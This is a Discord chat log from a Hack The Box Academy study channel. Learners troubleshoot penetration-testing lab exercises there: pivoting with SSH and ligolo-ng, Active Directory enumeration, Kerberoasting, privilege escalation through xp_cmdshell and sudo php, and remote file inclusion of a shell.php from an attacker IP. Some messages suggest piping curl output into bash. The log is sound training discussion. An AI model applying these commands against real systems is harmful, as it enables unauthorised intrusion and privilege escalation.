#modules
I think this should not be an issue right?
proxy_dns
strict_chain
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9050
@fathom pendant
Looks fine
¯_(ツ)_/¯
Also dont copy/paste the configuration like that, due to markdown discord treats # as header tags
thank you so much for your time @fathom pendant, i will take care of that
Wrapping in codeblock works best
indeed
But i suggest reaching out to support if my troubleshooting suggestions dont work
definitely
@fathom pendant apologies to disturb you again, on the same machine I was doing some experimentation:
Using these commands i was able to login:
ssh -L 3389:172.16.5.19:3389 ubuntu@10.129.101.20
xfreerdp /v:127.0.0.1 /u:victor /p:pass@123
would you have any clue why this worked, proxychains xfreerdp.... is not working
You forwarded port with ssh thats why i guess
You're binding your port 3389 and forwarding it to the remote 3389
-L "Link"
At least thats how I read it
exactly....I know that much...but I guess Proxychains and xfreerdp3 need some configurations to work together
Because 127.0.0.1 is a local host...u cant ping that from outside
Ssh is routing your traffic to local host
-L [local_interface:]local_port:remote_host:remote_port
Actually no
Thats y you were able to do rdp while its running on 127.0.0.1
It's routing the traffic from the specified port through ssh to the remote machine
exactly, but when using ssh -D 9050 ubuntu@10.129.x.x and using proxychains xfreerdp... i wasnt able to login
👀
I cant figure out this differential behaviour... as both serve the same goal...one succeeded one didnt
It's not routing to your localhost
Port forwarding
Same goal, different methods
I hope you remember we were unable to login via rdp using proxychains
Well he got it
Yeah
But at some time u did without sudo
that was for NMAP😅
Sudo really is only required with nmap due to packet nonsense
"also" 😂
Hi.
I'm in the Hacking WordPress - Skill Assessment.
I'm stuck on this question, I finished the assessment and got RCE but cannot find this flag.
The Hint says review the WPScan result but I did and that did not help much.
There is not "Unauthenticated File Download" vulnerability in the output, but there is LFI which I used to gain access to another flag.
🤣
Module number
send the link...to module
There's a search feature in academy
I think i have gone through this
They even said the module name
I am not sure
And section name lol
Can u tell module number
😅
I can access academy on phone, just turn on desktop mode in the browser
Yeah its possible but its really small screen which i am not really comfortable to
I hope hackthebox can come out with a mobile app so that I can learn more conveniently.
I remember a while ago, I was studying with my phone outside, but I couldn’t operate pwnbox better, which was very frustrating. lol
Nice try btw
In documenting and reporting module they say :
"Do yourself a favor, use Word for Windows, and explicitly avoid using Word for Mac. If you want to use a Mac as your testing platform, get a Windows VM in which you can do your reporting. Mac Word lacks some basic features that Windows Word has....."
Any other solution for this? Im on mac but when im doing the exam i'll have lots of windows open, already 1 vm, and running another vm with windows will take up lots of resources
Word is also available online
You can try that
Or u can try google one
ummm, i'll do that then, thanks a lot
Welcome
So i can use google docs?
so is word, but for the cpts exam maybe I can't use google docs?
For CPTS just use sysreptor
They literally have a section called "HTB Reporting" where they have ready-to-use templates for CJCA, CBBH, CPTS, CDSA, CAPE, and CWEE
https://docs.sysreptor.com/
Salut !
hey, has anyone doing the Linux Local Privilege Escalation - Skills Assessment managed to get a shell on the box without using the provided SSH creds? i tried a bunch of stuff but no luck so far just wondering if it's even possible or if i'm overthinking it – any hints or confirmation would help.. i tried every attack path for tomcat man... i just need to figure it out to go on :))
@storm elk do you know who i am?
Waiting for PowerView to grab a groups ACLs takes mega time atm, over 60 minutes and just hanging, getting a user's ACLs fine tho.
As far as I can see in the section text I'm following it. Question wanted me to check the GPO Management group
just from gpo...there is a vuln in gpo..we can make new gpo and use it for our purposes
i think you can check that...
Thank you
welcome
I solved it.
Turns out WPScan did not detect the "Unauthorized File Download" so I had to search for it manually on ExploitDB.
This is kinda stupid tbh, but it is what it is.
Is the Web Service & API Attacks the CBBH version of Attacking Enterprise Networks?
like Is it worth a blind attempt?
or should I just go with the walkthrough?
Hi All, once my year subscription ends, will I still have access to the already started modules? if its 1/20 for example?
As far as I'm concerned.
You only keep access to the modules that you already finished.
Makes sense, I was curious if the module is considered "Already purchased"
That is a very important realization. Just because an automatic tool doesn't see it doesn't mean it's not there...
only if you unlocked that module with cubes
u will have access for it , even if your subs expires
However fully complete sections will always be available? regardless of sub?
yes, they will
yo guys
im on privileged access from AD attacks
so the question says What other user in the domain has CanPSRemote rights to a host?
so i collected all objects in the domain using sharphound
and transferred them to my linux
i uploaded all the .json files to bloodhound
and i used this cypher command from the module (which, should show all users with CanPSRemote permission)
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
but nothing appeared
i ended up using powerview to get the members of remote management users group of the ACADEMY-EA-DC01 (because i already know that computer name exists, so i tried it. but what if i didnt know it ?), and i got the user
why it didnt appear in bloodhound ?
Bloodhound's data depends on your ingestor and not all of them are created equally nor do all of them gather all the data, it's still better to use other command line tools or to modify the ingestor
Just wondering, is there a way to "reset" a module and do it again? Erase the answers
nope
ended up using this
foreach ($computer in $(Get-DomainComputer | Select-Object -ExpandProperty Name)) { Get-NetLocalGroupMember -ComputerName $computer -GroupName "Remote Management Users" }
i guess it would do the job later too
Oh... Thanks. It would be cool
Yeah,Welcome
In my CBBH I used MSWord on Mac OS and works good and was acceptable,
For the Advanced Command Obfuscation answer make sure after ip= that there is no newline or spaces in burp repeater
if you have the correct NTLMv2 hash, rockyou should do it
Just did retire nibbler model in the walk through academy
One more to go for the beginner part privilege escalate to root
Is Linpeas good to use for the boxes it does a lot of enumeration within it
Hi Community
I cant get VNC creds in CAPE skill assesment lab, I make user Arturo as local administrator on SUPPORT but cant find vnc cred, please give some hints
https://academy.hackthebox.com/module/263/section/3095
5th question
This is all about lateral movement, so if you can't find it on one host, you likely have to move laterally to eventually identify it.
I know that you mean Backup host but I didnt find any way to move that host, no open ports, and also rev shell with wsus update didnt worked
I would keep trying the WSUS part you mentioned. You can DM what you have tried. Might be a simple thing that was overlooked.
Thank you
so nobody can help me out with this?😥 any hint would be appreciated...
Yeah its good, it gives all you need at once...then it's just matter of how you read linpeas output...but even in linpeas output you need to filter noise
Whats the name of the module
Linux Local Privilege Escalation - Skills Assessment
I havent done that module, but you can try rev shell
Or rdp
Hi anyone free for a DM for DACL 1 Skills assessment, just want to clarify something in regards to the ACL
Then use curl and pipe it over to bash
@gusty cobalt let's try not to spoil info for modules above t0, even if it's an alternate way to get a shell
https://academy.hackthebox.com/module/214/section/2285
Can someone help me out?
I found the process argument but it's not working
Possible to get help?
No one was helping me since yesterday
I haven't done that module
Oh
I'll be back at my PC in a minute. You can DM what you have.
HTTP Status 405 – Method Not Allowed 😥
help please
@proper dove dont spoil module content
Use the literal word 'PORT' instead of the given port
you might be missing some of the arguments
Hey, i just found someone with lot of the academy content outside of HTB without mentioning HTB, can I DM a moderator ?
Report the website using /spoiler [click the one that is hackster]
Thanks
Dm me
Dm me
yo guys im trying to copy printspoofer.exe to a host for PE through an mssqlclient.py session with xp_cmdshell
ive made an smbserver.py with creds because host doesnt allow guest auth to smb share
when i type xp_cmdshell whoami i get nt service\mssql$sqlexpress
Sorry , thx, work !
the password (as the module mentions for this sql service account) is SQL1234!
thx, its done !
Np
so i tried setting the user in smbserver.py to mssql$sqlexpress and password to SQL1234! but when i try to download the file using xp_cmdshell copy \\ip\sharename\printspoofer.exe i get the user or password is incorrect
Hi I am currently on the active directory enumeration and attacks and I am having lots of issues with rdp. I've tried multiple solutions and I just can't connect for some reason
windows sometimes doesn't like a blank user/pass
Name of the module
same rn, use the pwnbox
im using the target service account's creds
well if you're copying from your own smb server
its been like that the whole day but it just returned working before a while
Does anyone else have an issue where you try to ssh the target, but then you are unable to type the password?
Ok I'll keep checking
you can type the password; it just doesn't show up. This is an intentional security feature
Oh
Hey guys
what u think the username should be if whoami returned nt service\mssql$sqlexpress ?
i guess it acts weird cuz its a service account
well no, what I mean is that if you're copying a file From your smb share, sometimes windows doesn't like to grab files from a service you're not authenticating to. (i.e. your smb share isn't using a user/pass, so Windows doesn't like that)
@limber schooner this isn't the server for that kind of nonsense
Soryy
the general only way an account gets hacked is if you run a program from a "friend"
but this isn't a tech support server.
best practice is to just reset and change all your passwords
Yes i think
I was initially right
for the question above earlier
i just didnt put a "," for exit which was stupid
lol that's silly
wrong reply also
yeah, it's silly how they made me do it, even though what i had was right and I knew i was correct
I just wanted to bump this, i found the process and killed it but it booted me out of the target, has anyone ran across this issue?
You’re trying to replace the original ntds
You don’t need to place the copy there
Focus on the blog
I have a question, since i completed this. How do I check what modules i done for that path?
So i can go back and read stuff over
oh
didnt even know that was a thing
will say this took me a week and a half to do
Oh boy im scared about the exam
yeah im just gonna look at the CPTS win priv escalation before i do anything
Can DM what you are trying.
could someone help with the skills assessment on the cbbh module
How am i related to that
hum i dont know but i cant write in general chat
u can help me?
Tag a mod not me
Guys hello I bought wireless usb adaptor and can anyone help me to configure it?
https://academy.hackthebox.com/module/143/section/1489 i did first question ,
how to do 2nd question that is ,
- 0 What is this user's cleartext password?
i guess we need syncronuser password it is ? how ?
when i run secretsdump.py it give some hash but not for this user.
Same thing for me, and that's considering that the web app is mega slow
Cleartext means you need to crack the hash
anyone help for https://academy.hackthebox.com/module/147/section/1657 I established the tunnel but whenever i try to run some command it has timeout, i got kerberos ticket in my environment it was valid so i dont think is due to that, and the tunnel connected
Hi everyone, im trying to install SecLists and Gobuster for the Web Enumeration module, but as you can see the installation of both give me an error, can someone tell me how to fix it?
--fix-missing generally works
Can u give me the entire command?
sudo apt-get --fix-missing
Is this for SecLists or gobuster?
It's for installing missing packages that may be preventing full installation of any tool, including seclists and gobuster
I'm trying to install defaultcreds-cheat-sheet with pip3 but it gives me this error. I tried to do what it tells me but it doesn't work. I tried to search online and I didn't understand much.
oops
sudo apt-get update --fix-missing
Same error during the sudo apt install gobuster
python3 -m venv myenv && source myenv/bin/activate
run this as root
can you share the error?
this should work
This one
The same than before
You're getting that while using the --fix-missing argument?
thanks
Try using pipx
Pipx install <name>
I have run sudo apt-get update --fix-missing and then sudo apt install gobuster
Update and upgrade
Then install gobuster
Im trying
I'm too tired to try debugging apt at this time 
@devout lily Try either installing with go, or building it from source: https://github.com/OJ/gobuster
Read your error. A simple Google search will likely help you.
Hi how can can we get bsd brawl pls
Anyone got a decent cheat sheet for windows privesc?
Module: MSSQL, Exchange, and SCCM Attacks/SCCM Site Takeover II/ question2: Connect to the shared folder \LAB-DC\SCCMShare\SCCMServer01 using the hash of SCCM01$, and read the content of the file flag.txt.... i got the hash, but cant connect, either login failure or connection refused
I hate and love this answer because I feel like itll be a little complex when he starts digging into why, if the problem he is having is what I think he is having.
Can you authenticate with netexec using the user and hash?
Idk, I am pretty sure I've had this same error before and a little GoogleFu got it sorted out.
nope. nxc just breaks now out of nowhere
Restarted the lab?
let me try that
didnt work
You can DM if you'd like.
thanks mate, i will get some rest now, and dm you later, really appreciate it
Guys if this question is not appropriate pls delete or forward me to another place. I bought usb wireless adaptor for my VM but when i hit command sudo airodump-ng wlan0mon I don't see any networks it starts working but doesn't show me networks?!
You don't need a USB wireless adapter for the modules.
I need it for myself
im doing ctf fawn and task 7 says : What is the command we need to run in order to display the 'ftp' client help menu? and i said ftp -h i searched on youtube other ppl doing it for them the answer works for me it doesnt can anyone help
You are aware that attacking networks for which you do not have explicit permission is illegal.
Bunny I know what is legal and what is not legal may be I just learning something new for myself may be I have an assessment with a client to check his or her wireless networks there may be many options
There are many possibilities, but this has nothing to do with HTB.
I know that it doesn't have but possibly here will be a person who will help me and as there is no such person the question is closed
can someone help?
There's a whole list of compatible wireless cards for linux
Fawn is from StartingPoint, right? If so, then ask in #starting-point
hey guys in the skill assessment medium footprinting, after i found the creds through mounting the nfs server, when i tried to xfreerdp into it like this
xfreerdp /v:10.129.220.178 /u:alex /p:"....."
it throws this error
bash: !mD: event not found
i tried to bypass it using set +H and then set -H after i execute the cmd, but then the rdp connection prompts this
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:54:028] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:227] [2803:2804] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[23:24:57:228] [2803:2804] [ERROR][com.freerdp.core] - freerdp_post_connect failed
can someone help me with this
Put the password in single quotes
! Is a special character in bash to invoke history
did that and it did the same thing aswell with the rdp response
idk if its a problem with my vpn or something, cuz i can ping the target host without any error during transmission
is it an issue that im using the UDP version?
lemme try using the tcp and resetting the target
this fixed it, thank you so much dude 🙏
As a general tip: /cert:ignore /dynamic-resolution
?
Im confused by the AI red team Manipulating the Model exercise there is no fixed input message or and indication of what the questions for the exercise wants?
@coarse crest thats not what this server is about. Reach out to the website support for whatever company you lost your account on.
Reach out to their support
I did they can't do anything about it
oh ok ima add it to my notes thx so much dude
Then that sucks, but we can't "recover accounts" as that involves committing a felony in order to recover your account
Ohh it's alright thank you
Can anyone help me understand what Manipulating the Model exercise answer requirements are for the questions its not clear to me what its looking for in a text answer?
may be you specify module and section you are working on?
Introduction to Red Teaming AI - Manipulating the Model
Marcie may I ask you for an advice which adapter normally works with kali linux and blackarch linux? they don't specify chipsets on boxes usually may be you know the model?
A serious community is always good, and in a way it is also a science of formation and organization while maintaining authority so that the community does not give the impression of a complete fan community. In this community, this is not observed, no matter who is doing it.
?
There's a list of compatible devices, and Google can help figure out chipsets. It's completely irrelevant to academy.
In every community you seek seriousness, like a reliable shore in a stormy sea. This is the science of order, of how to maintain authority so as not to get bogged down in the chaos of a fan club. But here, in these parts, this science cannot be found. And it does not matter who was looking for it, who needed it. All efforts were drowned in silence.
? We redirect people to the appropriate places to ask questions, if possible.
There are more serious channels, but those require linking your htb account to view and access
Is there really nobody that can assist with Intro to Introduction to Red Teaming AI - Manipulating the Model I just want to understand what the questions for the lab want?
Anyone done the User Behavior Forensics module? I'm stuck on the last question in the skills Skills Assessment, i've found the timestamps of the copy paste event in the sqlite db but they aren't right apparently.
Guys i did the Learning Progress module but i cant understand the last and only question that says:
1.00 to the power of 365=1
1.01 to the power of 365=37
"What is the difference between the two numbers of the learning progress mentioned above?"
Like i understood it and answered it but It keeps saying "incorrect answer" what should i do 🙏☹️
The difference == big - small
Still incorrect
Also, decimals matter
1.01^365 != 37. It's 37.7
It's even stated in the reading portion
hey guys im finally done with the footprinting module, but i mostly struggle when i access IMAP/POP3 servers, like their queries are so stupid so does any1 have a good cheat sheet regarding their stupid queries
I tried to find some for them, but couldn't find for some rzn
I used an atmail blog for my imap notes
whats that
A blog, by a company (atmail) that details commands
oh finally man something thats nice, thanks so much dude 🙏
I thought it was mirror problem, is it something else? You don't gotta go into detail
Why can’t I talk in general
Because you need to link your account, there's instructions in #welcome
Ok
Yeah just a sources list issue. Easy fix.
please help 😦 I am doing the Remote File Inclusion (RFI) section in the module named File Inclusion
I tried curl and ping to the ip, everything works just fine on both the browser and the terminal. The page shows
<h2>Containers</h2>
<br />
<b>Warning</b>: include(http://10.10.15.173:80/shell.php): failed to open stream: Connection timed out in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'http://10.10.15.173:80/shell.php' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>47</b><br />
<br />
hey i actually got it, i couldnt sleep cause of this... why i was stuck was cause, they didnt explain this in the course material, so i had coerce a second time for the intended machine so it can create a socks relay, for this to work i had to petitpotam twice, not once like in material or even the solution, which made me doubt myself even more. at last i got it.
i dont think someone that follows the course will get it, kinda feel bad for them, knowing how rare someone actual can help
and now, i must pay back my sleep debt 🤌
It was covered in this part of the section: NTLM relay from a passive server. Regardless, I'm glad you sorted it out.
I did that 3 months ago, i forgot
All good, get some sleep.
not sure if this will help those in the future but wow, went to bed. started a new pwnbox and copy and pasted the same hash in and rerun hashcat with rockyou.txt, again same as my notes and suddenly it cracks. thanks for the help
true, i figured out how to do it in the beginner module getting started and nibbles box. i had download the file then insert the .sh into the vulnerable part it was under a diff name so i couldnt find it lol but i got it
i had such a hard time with this skill assessment too, i ran into some troubles with another hash for reason i still don't understand so i'll just blame the environment for it lol. glad you made it work
Yo guys Ive been stuck for a while on the Password Attacks assessment. Ive Gotten RDP into JUMP01 and I have tried EVERYTHING (ive thought of) but the only thing I have gotten is a password like
<AdministratorPassword>
<Value>REDACTED_r00t!@0</Value>
<PlainText>true</PlainText>
</AdministratorPassword>
But I cant use this to gain Local administrator rights??? Is this for another account? is this just a red herring? is it not local admin???
ive also found a .psafe3 file but Ive tried to use that password with no success.
Im legit stuck. Ive been doing this for 5 hours and I have no clue where to go. If anyone has any hints for privilege escalation
You can DM
I need help buying the CJCA exam voucher
You'll need to reach out to support on the website if you need help with that.
sudo apt install gobuster
stuck on getting started privilege escalation to root
i was able to get lineum running maybe gotta mess with reverse shell a bit a different one
Always check for which privileges you have.
yes i ls -la
no, that lists the contents of your current working directory
re-read the section about privileges and try some of that
Again, go re-read the User Privileges section. I don't see $TERM as one of the things it shows you.
i did sudo -l im going to look because i think its staring me in the face
i already did linenum imma recheck ill hit u in a few
@dry falcon Please do not spoil content from modules above tier 0
Can u do 'sudo -l'
yes
/usr/bin/php is nopasswd
if im saying too much let me know i dont wanna spoil it for anyone else doing this one
bruh
i feel like i worked around this
it was in my effing face
hey guys can anyone help me with this please i have the Summary report but i cannot find the pass
You can dm me
https://gtfobins.github.io/ this is a really good site
It means that you can run php as root, so you just need php syntax to execute bash commands
yes, imma messag you
thz bro
can anyone help me guys 🥲 idk what to do, its in module: Password Attacks, section: Credential Hunting in Network Shares
Patterns are helpful
I just finished this section but I don't remember ever using this file...
yeah, you can dm me
fieryflame is the best
he explains teaches
i was banging my head on the wall for that module for 7 hours
has anyone managed to solve prompt injection module jailbreak 2? i got the flag but i didnt solve it properly, the llm didnt even give me proper response needed for conditions to flag but i got it anyways
@opal shuttle bro thank you so much for helping me, you r the best 🙂
can any one help me with remote & local port forwarding with ligolo-ng (i searched up internet for 2 days still cant figure out) ; D
Port forwarding and tunneling module?
i completed that module i am just confused with port fwding with ligolo
Ohh ohkk
Plenty of guides online
From: the remote interface:port
To: either your device or some other remote device
I suggest messing with ligolo in the double pivot sections in the port fwd sections
i found dante to be good for ligolo practice if u plan on doing that
If you have a solid understanding of port forwarding it makes sense
i do have that but the ligolo commands messed with my head
had to use ssh port forwarding with ligolo
I swear theres some syntax stuff in the ligolo docs
i checked it tested it. it wasnt working for me for some reason
it helps to know what youre struggling with ¯_(ツ)_/¯
wait will drop command here
Like is it the --from --to syntax?
listener_add --addr 0.0.0.0:11111 --to 127.0.0.1:22222 --tcp
its just this
listener_add --addr 0.0.0.0:30000 --to 127.0.0.1:10000 --tcp
after using it how should i use my http.server to transfer file to target or vice versa (i tried it wasnt working)
Your http server should be running on port 10000 (if its just a single hop)
--addr is the remote/target and port
Will try that. Thank you
For multiple hops, --addr <either 0.0.0.0 or a specific interface on the target>:11601 --to 127.0.0.1:11601
Repeat for each hop in the session
If you run ligolo with sudo it can even create interfaces so you dont have to stop/start sessions in order to continue pivoting
Thanks a lot
I think i ended up setting the suid bit for it bc im lazy lmao
And as a general tip, for windows machines you may need to do
Set-ExecutionPolicy Bypass -Scope Process
Otherwise it can cause issues
Hello !
Did the machine for Velociraptor work for you ? The path URL never work with VPN or HTB VM 🙂
- Introduction to Digital Forensics > Evidence Acquisition Techniques & Tools
Sir, did you have a stroke?
Yeah but i am fine
Thanks for the care btw
👍
Hey! I'm getting these errors when doing SSH port forwarding, any tips?
channel 4: open failed: connect failed: Temporary failure in name resolution
channel 5: open failed: connect failed: Temporary failure in name resolution
channel 6: open failed: connect failed: Temporary failure in name resolution
channel 7: open failed: connect failed: Temporary failure in name resolution
Connection issues most likely
Could it be an issue on the BOX? I've tried disconnecting and connecting again and still get these.
Try using chisel
Never used it but ok I'll see what it is
Yeah it's worth learning
I vaguely remember there was mention of it in the port forwarding module, I'll re-read it. Thanks
Ligolo-ng is superior
What module is this for? If its for a box, ask in #boxes and provide the box name and maybe someone else can help
This is for the AEN module
Ah, I used ligolo for my pivoting
I see people don't like to use SSH? Is it bad compared to chisel or ligolo?
Ligolo sidesteps the need for proxychains, it works on a different layer
And allows icmp traffic
Thanks... So are you saying I shouldn't use SSH and learn ligolo instead?
If you understand the fundamentals of how pivoting and port forwarding works: yes
Got it. Thank you, Marcie!
just wanted to know once i complete a module, even if my subscription runs out will i always have access to that information for reference?
Yes
Any module completed under the access based subscriptions are yours forever
it's a good idea to know how to do both, there are some cases where the only entrypoint to an environment is TCP/22 inbound
perfect, thanks.
or: the jump host has a public IP, but you don't
Hello, where do we report bugs? Cubes icon is gone from the academy!
Can you see it or is it just me?
Uh not sure. If an icon isn't loading, it could just be you
The cube icon is gone from everywhere in the Academy, modules, menu, Billing Page
I still see the cube icon. Unless you mean the number of cubes you own. You can find that in billing
Yeah, I see the number but I don't see the cube logo, the green cube
Not sure about it, might be a UI update. Reach out to HTB support
anyone here happen to have experience with the tool subbrute? I just can't seem to get it to work.
Module: Attacking Common Services
Section: Attacking DNS
Like if you open any module, it is blank, no cubes on the right side of the section for example. Yeap
again; htb support
I still see em
Are you using firefox?
yes
idk if its just my end but HTB visual bug happening, no extension button. Probs the image ref failing.
Hello, i'm using the HTB box, 'LLMNR NBT NS Poisoning from Windows' , i have to use Inveigh in RDP, but the session crash, i can't close the rdp session...
seems we're experiencing similar, ive reported
Good I ain't alone
bummer academy is having some issues, all of my progress is bugging out too!
Exactly, this is what I was talking about!!!
Why doesn't it let me paste images in the chat
ah okay then I am having exactly the same issue as you lol
you need to vatat
Ahhh gone for me too when I refreshed page
*verify
Alright
I thought what could vatat possibly be lol 😄
clearly means "verify at the available time"
Some next level cover
on brightside the progress is stored elsewhere just a visual bug, support looking into it
As long as the progress is not tied to this visual bug, it's bearable
imagine if it was client-side progress only 😄 then people would be able to 100% the course and take an exam without ever doing a module
But now I realise how more satisfying is having those cubes
it really is a huge motivator and demotivator if you haven't got far through a module ikr!
36 sections basically is 3 modules in one this AD Enumeration 😄 fun as hell tho
I am currently doing the Introduction to Windows Command Line. Lots of text
Have been troubleshooting for over 30 mins only to just realize I forgot to connect to the VPN FML
Do you practice after every module in Labs or you firstly finished all the general modules like which are the prerequisite for CPTS i.e and then went into labs?
I haven't 100% the course yet so im at 66.7% I haven't done pro labs yet but I frequented VulnLabs over last 6 months, once done ill probs do a few labs and AEN blind and see where im at
I mean machines in HTB Labs, not the Labs themselves😅
No, like machines in Starting Point, Retired ones...
^ not related to Academy
I see! yeah I probs won't do much outside of academy and then reinforce with Pro Labs only, see where im at
Hm, are you satisfied with the practice just in Academy?
There is a checklist of labs machines that are good for prepping for CPTS
AEN Blind will be the answer for that question
I dont know how bad my methodology is till I actually put it to work
What is AEN?
Attacking Enterprise Networks, last module of CPTS
I see
It has been mentioned doing this blind is the real test before your exam, writing a report etc
I am still not sure whether I wanna proceed first with CPTS or CBBH after I complete the Information Security Foundations. I know both are different, but both seem engaging, especially CBBH could be put in more practice irl for now, i.e, I think
you got a subscription or you buying with cubes atm?
I wasted first few months of my sub so I am doing cpts only now
I am using the Student Sub, but in August I will buy the Silver Annual. CJCA looks like a good start too before the other two exams.
when you do CPTS youll find the modules overlap with CBBH so im almost 2/3 way through and I barely did any CBBH modules intentionally
I just wanna jump into machines, but I ain't sure how much should I know before I do that
That's great
visual bugs have gone for me
Yay, indeed
yeah
when you will complete CPTS, your CBBH will be 64.9%
I've found just diving in into retired boxes and going as far as you can, then using ippsec or official writeups to help poke you along to be effective for me. I learn more by doing than anything else personally, and I feel you'd find the same. Just my 2 cents.
Perfect timing 😄 was just going to ask if you knew!
thanks for this
Hello, good morning (here it's morning) I would like to know if anyone knows of a store like Silk Road on the dark web.
Not the place for this @hybrid sandal
I live in Brazil
Not for clear net discussion)
anything I import I pay double the price
im not sure if this is a serious rule break or not, waiting for a mod to decide 😄
Ops sorry
Thank you, but have you still done the foundations part in the Academy before attempting and some initial modules like NMAP, etc.
I find you just have to take the first step Rich, start doing one of them, then you'll know which one you prefer
and take the time to make notes, don't just CnP like I did in beginning 😄 have to revisit a few modules knowing that
I'd start with the starting point boxes then when you get to the "Getting Started" part in the academy. (assuming you are going down the Job tester path). A lot of the stuff in the "getting started" module can be used on stuff in the Starting Point and will help you get your bearings. That's how I started.
me getting same error how to fix it 😕
Yeah, I create cheatsheets and note other useful information in Obsidian to later refer to. Yeap, I can't wait, but I think will give myself some time to finish the Intro part, and then will jump straight into the paths. I for sure by the time have finished some module may forget something I learnt, but I think quick refresh through the module and notes will bring back the knowledge. But of course this is probably because of sort of lack of proper practice.
I have finished this module and was very proud when I pwned the final machine in the module myself, very satisfying
I guess there will be no deals on the VIP plans before Black Friday, as I am really looking into getting the VIP+ too
Did you buy your sub right in the beginning or I can benefit in some way having the free plan?
Thats awesome! Its a great feeling and it's all very rewarding. I'm 33 percent through the CPTS Path and I love every bit of it.
On the starting point I saw only half of the machines in each section are free, but would that be enough for beginner
I personally just bought the annual VIP+, but it was on discount around December when I did... it was like 120 for the year? 150? I dont remember exactly
Yes in my opinion
Yeah, I missed my chance in 2024
They do it every year from what I saw. Not sure if it's accurate but from what I gathered last year, they do that consistently around that time
Probably will wait then, and grind the free ones in the meantime together with the Academy sub
Perfectly reasonable.
Thanks for the suggestions and help
How to start my ethical hacking journey. What type of knowledge is required but the way i know coding like python and web development. Can some one guide me
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
HTB course are too expensive for me so can give me some another option
There are many modules in the Academy that are free of charge.
Thank you
web + machine https://tryhackme.com/r/resources/blog/free_path
web master : https://portswigger.net/web-security/dashboard
linux + reverse engineering + more https://pwn.college/
tier 0 free if u complete each module u get cubes back . https://academy.hackthebox.com/
linux basic commands https://linuxjourney.com/
Which module
I am doing Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux section in Active Directory Enumeration & Attacks. How to solve clock skew error as the attack host does not have either ntpdate or faketime?
```
└──╼ $GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
<snip>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```
I even tried to pivot and use my own host tools but got a new error 
```
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo timedatectl set-ntp off
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u FREIGHTLOGISTICS.LOCAL
[sudo] password for faiz:
2025-08-01 15:37:44.541814 (+0500) -86524.735147 +/- 0.214486 FREIGHTLOGISTICS.LOCAL 172.16.5.238 s1 no-leap
CLOCK: time stepped by -86524.735147
CLOCK: time changed from 2025-08-02 to 2025-08-01
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley: -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
<snip>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ sudo ntpdate -u INLANEFREIGHT.LOCAL
2025-08-02 15:40:08.602184 (+0500) +86524.697654 +/- 0.150084 INLANEFREIGHT.LOCAL 172.16.5.5 s1 no-leap
CLOCK: time stepped by 86524.697654
CLOCK: time changed from 2025-08-01 to 2025-08-02
┌──(faiz㉿FAIZ-XEON)-[~/HTB_Academy]
└─$ GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley -request
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
<snip>
[-] Principal: FREIGHTLOGISTICS.LOCAL\mssqlsvc - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
[-] Principal: FREIGHTLOGISTICS.LOCAL\sapsso - Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
```
Changing vpn server solved the clock skew in the first place.
Hey guys, is there anything I can do about this? Idk if I accidentally posted something here or if it's because of my blog...
Reach out to support

How long does it typically take to hear back? I was planning on working through the academy all day today
I wish somebody would have tried messaging me first either on here or on medium
for gobuster, how many threads (-t) should be speedy, yet stable?
Hello! I could take a hint on how to transfer files from client-provided ATTACK01 Parrot box back to my system. I'm currently working on AD enumeration and attacks, initial information gathering of the domain,
https://academy.hackthebox.com/module/143/section/1265
And while RDP connecting to the provided ATTACK01 box the window is ridiculously small so reading Wireshark output is a struggle. And either way I'd like to take the advice and transfer files and findings back to my system, in this case I'd like to bring home my Wireshark packet capture for inspection.
I've tried mounting a directory with 'xfreerdp's 'drive' switch but I could then not find it anywhere in the file system, nor with 'mount':
xfreerdp /v:<ATTACK01 IP> /u:htb-student /drive:/home/<my user>/rdp_share,/home/htb-student/rdp_share
Any advice on how to get files home from ATTACK01?
is there any chance you could nudge somebody for this? I'm happy to remove anything that violates terms. Just want to get back on today if possible. nob1as is my email handle
I sent an email to customerops for the record
Only Support can help you with a platform ban. However, Support does not normally read Discord messages.
Please read through this FAQ to find and fix policy violations yourself.
https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
I guess just simple 'scp' gets the job done. I was thinking if I could have it mounted for easier transfer. If anyone knows how, respond if you feel like it. I'll be 'scp'ing until I know better... not that there's anything wrong with 'scp'...
hello why i have no access in the general chat
but could you tell me that could i have to verify myself and then i have to do
Just follow the instructions
ok tell me the instructions
They're in #welcome
Yo
HI !
Anybody can help me please !
